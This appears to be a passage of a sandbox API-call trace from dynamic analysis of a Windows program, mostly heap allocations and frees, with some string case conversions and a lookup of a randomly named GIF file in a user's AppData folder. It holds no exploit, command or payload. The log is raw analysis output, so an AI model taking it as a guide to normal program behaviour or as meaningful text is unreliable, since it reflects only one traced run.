RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0122.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0122.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.231] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0122.232] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0122.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.232] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0122.232] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.232] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0122.233] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0122.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.236] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0122.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0122.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.236] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DZjNZY.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b359c0, ftCreationTime.dwHighDateTime=0x1d5d400, ftLastAccessTime.dwLowDateTime=0x36e47fd0, ftLastAccessTime.dwHighDateTime=0x1d5cefd, ftLastWriteTime.dwLowDateTime=0x36e47fd0, ftLastWriteTime.dwHighDateTime=0x1d5cefd, nFileSizeHigh=0x0, nFileSizeLow=0x98c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZjNZY.gif", cAlternateFileName="")) returned 0x9a47c0 [0122.237] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.238] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.238] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.238] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.238] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.238] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0122.238] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.238] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0122.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.239] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.239] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.239] HeapFree (in: 